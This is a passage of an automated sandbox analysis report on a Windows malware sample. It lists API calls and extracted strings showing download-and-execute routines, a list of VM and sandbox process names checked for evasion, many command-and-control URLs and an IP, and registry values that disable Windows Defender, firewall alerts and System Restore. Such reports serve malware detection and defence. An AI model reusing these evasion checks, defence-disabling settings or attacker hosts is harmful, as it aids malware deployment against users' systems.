SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
GetClientRect.USER32(0044A660,?), ref: 0040EC6E
StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
DeleteDC.GDI32(00000000), ref: 0040ECF1
GetCursorInfo.USER32(?), ref: 0040ED25
GetCursorPos.USER32(?), ref: 0040ED53
WindowFromPoint.USER32(?,?), ref: 0040ED67
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
GetCurrentThreadId.KERNEL32 ref: 0040ED7C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
GetCursor.USER32 ref: 0040ED96
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
GetCursor.USER32 ref: 0040EDAC
StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
_printf.LIBCMT ref: 0040EDFB
EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
GetActiveWindow.USER32 ref: 0040EE2A
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153

Strings

<, xrefs: 0040D710
<, xrefs: 0040C30F
<, xrefs: 0040CFE8
<, xrefs: 0040D2D3
<, xrefs: 0040BFDC
<, xrefs: 0040BA4C
<, xrefs: 0040CA99
<, xrefs: 0040C3EF
<, xrefs: 0040C955
<, xrefs: 0040D20D
<, xrefs: 0040E267
<, xrefs: 0040B5EC
<, xrefs: 0040CCED
<, xrefs: 0040DA42
<, xrefs: 0040E3EB

Memory Dump Source

Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
API String ID: 246057343-461452962
Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

Function 00402DF9 Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 231
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00402E27
memset.MSVCRT ref: 00402E3D
memset.MSVCRT ref: 00402E53
memset.MSVCRT ref: 00402E69
memset.MSVCRT ref: 00402E7F
_snwprintf.MSVCRT ref: 00402E9F
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00402EB8
GetTickCount.KERNEL32 ref: 00402EBE
srand.MSVCRT ref: 00402EC5
memset.MSVCRT ref: 00402ED9
rand.MSVCRT ref: 00402EE1
rand.MSVCRT ref: 00402EF5
_snwprintf.MSVCRT ref: 00402F21
InternetOpenW.WININET(Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0,00000000,00000000,00000000,00000000), ref: 00402F36
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402F64
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00402F93
LoadImageA.USER32(00000000,?,00000207,?), ref: 00402FC5
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00402FF4
CloseHandle.KERNEL32(000000FF), ref: 00403002
_snwprintf.MSVCRT ref: 00403020
DeleteFileW.KERNEL32(?), ref: 0040302F
Sleep.KERNEL32(000001F4), ref: 0040303A
CloseHandle.KERNEL32(000000FF), ref: 00403061
InternetCloseHandle.WININET(00000000), ref: 0040306D
InternetCloseHandle.WININET(00000000), ref: 00403079
Sleep.KERNEL32(000001F4), ref: 00403084
memset.MSVCRT ref: 004030A7
rand.MSVCRT ref: 004030AF
rand.MSVCRT ref: 004030C3
_snwprintf.MSVCRT ref: 004030EF
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040310B
memset.MSVCRT ref: 00403122
_snwprintf.MSVCRT ref: 00403142
DeleteFileW.KERNEL32(?), ref: 00403151
Sleep.KERNEL32(000001F4), ref: 0040315C
ExitThread.KERNEL32 ref: 00403171

Strings

%ls:Zone.Identifier, xrefs: 00403131
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0, xrefs: 00402F31
%ls\%d%d.exe, xrefs: 00402F10
%ls\%d%d.exe, xrefs: 004030DE
%hs, xrefs: 00402E8E
%temp%, xrefs: 00402EB3
%ls:Zone.Identifier, xrefs: 0040300F

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: memset$File_snwprintf$CloseHandleInternetrand$Sleep$DeleteOpen$CountCreateDownloadEnvironmentExitExpandImageLoadStringsThreadTickWritesrand
String ID: %hs$%ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
API String ID: 1494052058-3583034578
Opcode ID: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
Instruction ID: 78f194360a85e13182315f20d4f49311ac3511ff64a984fe922711d5a5a3e9c0
Opcode Fuzzy Hash: 1ad0d5694ba3353da19ccb1a57cf28654bca1c39efe4128642ffcffbbdb25b0c
Instruction Fuzzy Hash: D88157719803186AEB209B60DC4AFDA777CBF04705F1444B6B749F60D1DA785B84CF99

Function 0040317D Relevance: 50.8, APIs: 8, Strings: 21, Instructions: 71
sleeplibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
ExitProcess.KERNEL32 ref: 00403230
Sleep.KERNELBASE(00000064), ref: 00403238
ExitProcess.KERNEL32 ref: 00403264
Sleep.KERNELBASE(00000064), ref: 0040326E
GetModuleHandleA.KERNEL32(00407204), ref: 0040328E
ExitProcess.KERNEL32 ref: 0040329A

Strings

xenservice.exe, xrefs: 004031AD
pythonw.exe, xrefs: 0040318A
vboxtray.exe, xrefs: 004031BB
prl_cc.exe, xrefs: 00403191
vboxcontrol.exe, xrefs: 004031C2
vmtoolsd.exe, xrefs: 004031DE
vmusrvc.exe, xrefs: 004031A6
vboxservice.exe, xrefs: 004031B4
vmwareservice.exe, xrefs: 004031C9
dir_watch.dll, xrefs: 004031FA
tpautoconnsvc.exe, xrefs: 004031D7
wine_get_unix_file_name, xrefs: 0040321C
wpespy.dll, xrefs: 00403201
prl_tools.exe, xrefs: 00403198
sbiedllx.dll, xrefs: 004031F3
kernel32.dll, xrefs: 00403208
vmwareuser.exe, xrefs: 004031E5
python.exe, xrefs: 00403183
vmwaretray.exe, xrefs: 004031D0
vmsrvc.exe, xrefs: 0040319F
sbiedll.dll, xrefs: 004031EC

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: ExitProcess$HandleModuleSleep$AddressProc
String ID: dir_watch.dll$kernel32.dll$prl_cc.exe$prl_tools.exe$python.exe$pythonw.exe$sbiedll.dll$sbiedllx.dll$tpautoconnsvc.exe$vboxcontrol.exe$vboxservice.exe$vboxtray.exe$vmsrvc.exe$vmtoolsd.exe$vmusrvc.exe$vmwareservice.exe$vmwaretray.exe$vmwareuser.exe$wine_get_unix_file_name$wpespy.dll$xenservice.exe
API String ID: 2350661518-2780004707
Opcode ID: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
Instruction ID: b154389cd1554f0ebcfe2a125868a98a7489832b6cac9f633827aa8e2f46737f
Opcode Fuzzy Hash: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
Instruction Fuzzy Hash: 1831A570D08248DBDB109FE4DD4869EBFB4BB05705F10806AE502BE2D4C7B86949CF9E

Function 00479044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223
WriteFile.KERNELBASE(00000000,FFFADB8B,00003E00,?,00000000), ref: 00479252
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00479256
WinExec.KERNEL32(?,00000005), ref: 00479262

Strings

lstr, xrefs: 004791A7
catA, xrefs: 004791AF
.dll, xrefs: 00479102
dleA, xrefs: 004790D0
Crea, xrefs: 00479169
el32, xrefs: 004790FB
Kern, xrefs: 004790F4
GetM, xrefs: 004790B6
odul, xrefs: 0047922D
athA, xrefs: 00479199
GetT, xrefs: 00479188
WinE, xrefs: 00479110
XBVdJN.exe, xrefs: 004791FD, 00479200
Writ, xrefs: 00479148
Clos, xrefs: 00479129

Memory Dump Source

Source File: 00000000.00000002.2428993995.0000000000479000.00000040.00000001.01000000.00000003.sdmp, Offset: 00479000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_479000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-4190719182
Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

Function 00401E97 Relevance: 9.1, APIs: 6, Instructions: 70
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00401EA4
Process32First.KERNEL32(000000FF,00000128), ref: 00401ECD

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
Instruction ID: 642ac0987f55ef775eea862af307b23bb9844e3de74e62916ff785c59642b288
Opcode Fuzzy Hash: baa32c9e9472e9a97a9285d9a223c18884870fe0319c7d5719627d5b91124817
Instruction Fuzzy Hash: 6B3134709002599FCF219B64CD847EABBB5AB18314F1002EAE949B62A1D7389F85DF08

Function 0040373E Relevance: 434.8, APIs: 82, Strings: 166, Instructions: 813
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000003E8,?,?,?,00401182,00000000,?,0000000A), ref: 00403752

Part of subcall function 0040317D: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
Part of subcall function 0040317D: GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
Part of subcall function 0040317D: ExitProcess.KERNEL32 ref: 00403230

CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 00403CEA
GetLastError.KERNEL32 ref: 00403CF6
ExitProcess.KERNEL32 ref: 00403D05
memset.MSVCRT ref: 00403D2A
memset.MSVCRT ref: 00403D40
memset.MSVCRT ref: 00403D56
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D6C
_snwprintf.MSVCRT ref: 00403D8A
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D99
Sleep.KERNELBASE(000001F4,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403DA4
memset.MSVCRT ref: 00403DDB
memset.MSVCRT ref: 00403DF1
memset.MSVCRT ref: 00403E07
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
_snwprintf.MSVCRT ref: 00403E46
_snwprintf.MSVCRT ref: 00403E6D
PathFileExistsW.KERNELBASE(?), ref: 00403E7C
Sleep.KERNELBASE(000001F4), ref: 00403EDB

Strings

http://fifiehsueuufidhfi.ru/, xrefs: 004038B1
http://fiiauediehduefuge.biz/, xrefs: 00403C17
http://nnososoosjfeuhueu.ru/, xrefs: 004038C5
http://srndndubsbsifurfd.in/, xrefs: 004039BF
http://srndndubsbsifurfd.ru/, xrefs: 00403893
http://slpsrgpsrhojifdij.info/, xrefs: 00403C53
http://fiiauediehduefuge.in/, xrefs: 004039C9
http://slpsrgpsrhojifdij.biz/, xrefs: 00403A91
http://nousiieiffgogogoo.biz/, xrefs: 00403AF5
m.exe, xrefs: 00403799
http://afeifieuuufufufuf.net/, xrefs: 00403A4B
http://fiiauediehduefuge.ru/, xrefs: 0040389D
http://srndndubsbsifurfd.info/, xrefs: 00403CA3
http://iuirshriuisruruuf.ru/, xrefs: 0040387F
http://fifiehsueuufidhfi.biz/, xrefs: 00403C2B
http://aiiaiafrzrueuedur.net/, xrefs: 00403A0F
http://nnososoosjfeuhueu.info/, xrefs: 00403CD5
http://nnososoosjfeuhueu.net/, xrefs: 00403B13
http://eoroooskfogihisrg.su/, xrefs: 00403901
http://ssofhoseuegsgrfnu.ru/, xrefs: 0040382F
http://ssofhoseuegsgrfnj.com/, xrefs: 00403B1D
%ls\%ls, xrefs: 00403E5C
http://eofihsishihiursgu.biz/, xrefs: 00403B09
DisableBehaviorMonitoring, xrefs: 004043CF
4950050503930, xrefs: 0040375D
p.exe, xrefs: 004037A3
http://fifiehsueuufidhfi.com/, xrefs: 00403B95
http://ssofhoseuegsgrfnj.su/, xrefs: 004038CF
http://slpsrgpsrhojifdij.com/, xrefs: 00403B27
%ls\94000696690303050, xrefs: 00403E35
%temp%, xrefs: 004037DF
http://noeuaoenriusfiruu.ru/, xrefs: 00403875
http://aiiaiafrzrueuedur.com/, xrefs: 00403B31
http://fifiehsueuufidhfi.net/, xrefs: 00403A73
http://ssofhoseuegsgrfnj.info/, xrefs: 00403C49
http://eoroooskfogihisrg.biz/, xrefs: 00403BE5
http://iuirshriuisruruuf.info/, xrefs: 00403C8F
http://ssofhoseuegsgrfnj.net/, xrefs: 004039FB
http://nousiieiffgogogoo.com/, xrefs: 00403B8B
http://ssofhoseuegsgrfnj.biz/, xrefs: 00403BB3
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 0040429F
http://noeuaoenriusfiruu.net/, xrefs: 00403A37
DisableSR, xrefs: 00404583
http://fuaiuebndieufeufu.su/, xrefs: 004038ED
http://slpsrgpsrhojifdij.su/, xrefs: 004038D9
http://nnososoosjfeuhueu.su/, xrefs: 0040395B
http://noeuaoenriusfiruu.com/, xrefs: 00403B59
http://eiifngjfksisiufjf.biz/, xrefs: 00403BDB
SOFTWARE\Microsoft\Security Center\, xrefs: 00404406
http://fiiauediehduefuge.com/, xrefs: 00403B81
DisableOnAccessProtection, xrefs: 00404384
x, xrefs: 00404694
http://fuaiuebndieufeufu.biz/, xrefs: 00403BD1
http://eiifngjfksisiufjf.ru/, xrefs: 00403861
http://noeuaoenriusfiruu.info/, xrefs: 00403C85
http://afeifieuuufufufuf.su/, xrefs: 0040391F
%s%s, xrefs: 00404751
http://fiiauediehduefuge.net/, xrefs: 00403A5F
http://fifiehsueuufidhfi.in/, xrefs: 004039DD
http://ssofhoseuegsgrfnj.biz/, xrefs: 00403A87
http://fuaiuebndieufeufu.com/, xrefs: 00403B3B
http://iuirshriuisruruuf.biz/, xrefs: 00403ACD
http://fuaiuebndieufeufu.net/, xrefs: 00403A19
http://fiiauediehduefuge.su/, xrefs: 00403933
http://nnososoosjfeuhueu.in/, xrefs: 004039F1
http://nousiieiffgogogoo.ru/, xrefs: 004038A7
http://srndndubsbsifurfd.net/, xrefs: 00403A55
http://eofihsishihiursgu.net/, xrefs: 00403A7D
http://aiiaiafrzrueuedur.biz/, xrefs: 00403A9B
AntiVirusDisableNotify, xrefs: 00403807
Microsoft Windows Services, xrefs: 00403780
http://fuaiuebndieufeufu.biz/, xrefs: 00403AA5
http://afeifieuuufufufuf.biz/, xrefs: 00403AD7
http://iuirshriuisruruuf.in/, xrefs: 004039AB
http://nousiieiffgogogoo.biz/, xrefs: 00403C21
http://eoroooskfogihisrg.info/, xrefs: 00403C7B
http://eoroooskfogihisrg.biz/, xrefs: 00403AB9
http://srndndubsbsifurfd.su/, xrefs: 00403929
FirewallDisableNotify, xrefs: 00403825
http://fuaiuebndieufeufu.in/, xrefs: 00403983
x, xrefs: 0040463F
winsvcs.exe, xrefs: 00403770
%userprofile%, xrefs: 004037CB
http://noeuaoenriusfiruu.biz/, xrefs: 00403AC3
http://afeifieuuufufufuf.com/, xrefs: 00403B6D
http://aiiaiafrzrueuedur.biz/, xrefs: 00403BC7
http://afeifieuuufufufuf.ru/, xrefs: 00403889
DisableAntiSpyware, xrefs: 00404280
http://iuirshriuisruruuf.su/, xrefs: 00403915
DisableScanOnRealtimeEnable, xrefs: 00404339
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\, xrefs: 00404154
http://aiiaiafrzrueuedur.info/, xrefs: 00403C5D
http://afeifieuuufufufuf.info/, xrefs: 00403C99
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 004042C9
DisableBehaviorMonitoring, xrefs: 004043A2
http://srndndubsbsifurfd.biz/, xrefs: 00403AE1
http://nousiieiffgogogoo.info/, xrefs: 00403CB7
s.exe, xrefs: 004037AD
http://nousiieiffgogogoo.net/, xrefs: 00403A69
http://noeuaoenriusfiruu.biz/, xrefs: 00403BEF
o.exe, xrefs: 004037B7
t.exe, xrefs: 0040378F
http://eiifngjfksisiufjf.net/, xrefs: 00403A23
DisableOnAccessProtection, xrefs: 00404357
SOFTWARE\Microsoft\Security Center\Svc\, xrefs: 004044B4
%appdata%, xrefs: 004037D5
http://eofihsishihiursgu.su/, xrefs: 00403951
http://aiiaiafrzrueuedur.in/, xrefs: 00403979
http://slpsrgpsrhojifdij.net/, xrefs: 00403A05
http://fifiehsueuufidhfi.biz/, xrefs: 00403AFF
http://eiifngjfksisiufjf.info/, xrefs: 00403C71
AutoUpdateDisableNotify, xrefs: 0040381B
http://eofihsishihiursgu.ru/, xrefs: 004038BB
http://aiiaiafrzrueuedur.su/, xrefs: 004038E3
http://iuirshriuisruruuf.com/, xrefs: 00403B63
http://fiiauediehduefuge.info/, xrefs: 00403CAD
DisableAntiSpyware, xrefs: 00404253
UpdatesDisableNotify, xrefs: 00403811
http://eoroooskfogihisrg.ru/, xrefs: 0040386B
http://eiifngjfksisiufjf.com/, xrefs: 00403B45
http://slpsrgpsrhojifdij.biz/, xrefs: 00403BBD
UpdatesOverride, xrefs: 004037F3
http://eoroooskfogihisrg.com/, xrefs: 00403B4F
http://iuirshriuisruruuf.biz/, xrefs: 00403BF9
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
AntiVirusOverride, xrefs: 004037E9
http://slpsrgpsrhojifdij.ru/, xrefs: 00403843
http://srndndubsbsifurfd.com/, xrefs: 00403B77
%ls:*:Enabled:%s, xrefs: 00403EEF
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\, xrefs: 004042E7
http://fifiehsueuufidhfi.info/, xrefs: 00403CC1
http://fuaiuebndieufeufu.info/, xrefs: 00403C67
http://nousiieiffgogogoo.in/, xrefs: 004039D3
http://noeuaoenriusfiruu.in/, xrefs: 004039A1
http://eoroooskfogihisrg.in/, xrefs: 00403997
http://eiifngjfksisiufjf.biz/, xrefs: 00403AAF
SOFTWARE\Policies\Microsoft\Windows Defender\, xrefs: 0040422E
http://noeuaoenriusfiruu.su/, xrefs: 0040390B
%ls:Zone.Identifier, xrefs: 00403D79
http://eofihsishihiursgu.com/, xrefs: 00403B9F
http://eofihsishihiursgu.biz/, xrefs: 00403C35
http://fuaiuebndieufeufu.ru/, xrefs: 00403857
DisableScanOnRealtimeEnable, xrefs: 0040430C
http://eoroooskfogihisrg.net/, xrefs: 00403A2D
http://iuirshriuisruruuf.net/, xrefs: 00403A41
http://eiifngjfksisiufjf.su/, xrefs: 004038F7
http://nousiieiffgogogoo.su/, xrefs: 0040393D
http://fifiehsueuufidhfi.su/, xrefs: 00403947
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\, xrefs: 00404562
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
http://eofihsishihiursgu.in/, xrefs: 004039E7
http://srndndubsbsifurfd.biz/, xrefs: 00403C0D
http://eofihsishihiursgu.info/, xrefs: 00403CCB
http://afeifieuuufufufuf.in/, xrefs: 004039B5
http://afeifieuuufufufuf.biz/, xrefs: 00403C03
http://aiiaiafrzrueuedur.ru/, xrefs: 0040384D
DisableSR, xrefs: 004045B0
http://nnososoosjfeuhueu.com/, xrefs: 00403BA9
http://92.63.197.48/, xrefs: 00403839
http://eiifngjfksisiufjf.in/, xrefs: 0040398D
FirewallOverride, xrefs: 004037FD
http://nnososoosjfeuhueu.biz/, xrefs: 00403C3F
http://ssofhoseuegsgrfnj.in/, xrefs: 00403965
http://slpsrgpsrhojifdij.in/, xrefs: 0040396F
http://fiiauediehduefuge.biz/, xrefs: 00403AEB
%windir%, xrefs: 004037C1

Memory Dump Source

Source File: 00000000.00000002.2428787049.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2428765288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428823607.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_290.jbxd

Similarity

API ID: memset$FileSleep_snwprintf$ExitModuleProcess$AddressCreateDeleteEnvironmentErrorExistsExpandHandleLastMutexNamePathProcStrings
String ID: %appdata%$%ls:*:Enabled:%s$%ls:Zone.Identifier$%ls\%ls$%ls\94000696690303050$%s%s$%temp%$%userprofile%$%windir%$4950050503930$AntiVirusDisableNotify$AntiVirusOverride$AutoUpdateDisableNotify$DisableAntiSpyware$DisableAntiSpyware$DisableBehaviorMonitoring$DisableBehaviorMonitoring$DisableOnAccessProtection$DisableOnAccessProtection$DisableSR$DisableSR$DisableScanOnRealtimeEnable$DisableScanOnRealtimeEnable$FirewallDisableNotify$FirewallOverride$Microsoft Windows Services$SOFTWARE\Microsoft\Security Center\$SOFTWARE\Microsoft\Security Center\Svc\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SOFTWARE\Policies\Microsoft\Windows Defender\$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesOverride$http://92.63.197.48/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.com/$http://afeifieuuufufufuf.in/$http://afeifieuuufufufuf.info/$http://afeifieuuufufufuf.net/$http://afeifieuuufufufuf.ru/$http://afeifieuuufufufuf.su/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.com/$http://aiiaiafrzrueuedur.in/$http://aiiaiafrzrueuedur.info/$http://aiiaiafrzrueuedur.net/$http://aiiaiafrzrueuedur.ru/$http://aiiaiafrzrueuedur.su/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.com/$http://eiifngjfksisiufjf.in/$http://eiifngjfksisiufjf.info/$http://eiifngjfksisiufjf.net/$http://eiifngjfksisiufjf.ru/$http://eiifngjfksisiufjf.su/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.com/$http://eofihsishihiursgu.in/$http://eofihsishihiursgu.info/$http://eofihsishihiursgu.net/$http://eofihsishihiursgu.ru/$http://eofihsishihiursgu.su/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.com/$http://eoroooskfogihisrg.in/$http://eoroooskfogihisrg.info/$http://eoroooskfogihisrg.net/$http://eoroooskfogihisrg.ru/$http://eoroooskfogihisrg.su/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.com/$http://fifiehsueuufidhfi.in/$http://fifiehsueuufidhfi.info/$http://fifiehsueuufidhfi.net/$http://fifiehsueuufidhfi.ru/$http://fifiehsueuufidhfi.su/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.com/$http://fiiauediehduefuge.in/$http://fiiauediehduefuge.info/$http://fiiauediehduefuge.net/$http://fiiauediehduefuge.ru/$http://fiiauediehduefuge.su/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.com/$http://fuaiuebndieufeufu.in/$http://fuaiuebndieufeufu.info/$http://fuaiuebndieufeufu.net/$http://fuaiuebndieufeufu.ru/$http://fuaiuebndieufeufu.su/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.com/$http://iuirshriuisruruuf.in/$http://iuirshriuisruruuf.info/$http://iuirshriuisruruuf.net/$http://iuirshriuisruruuf.ru/$http://iuirshriuisruruuf.su/$http://nnososoosjfeuhueu.biz/$http://nnososoosjfeuhueu.com/$http://nnososoosjfeuhueu.in/$http://nnososoosjfeuhueu.info/$http://nnososoosjfeuhueu.net/$http://nnososoosjfeuhueu.ru/$http://nnososoosjfeuhueu.su/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.com/$http://noeuaoenriusfiruu.in/$http://noeuaoenriusfiruu.info/$http://noeuaoenriusfiruu.net/$http://noeuaoenriusfiruu.ru/$http://noeuaoenriusfiruu.su/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.com/$http://nousiieiffgogogoo.in/$http://nousiieif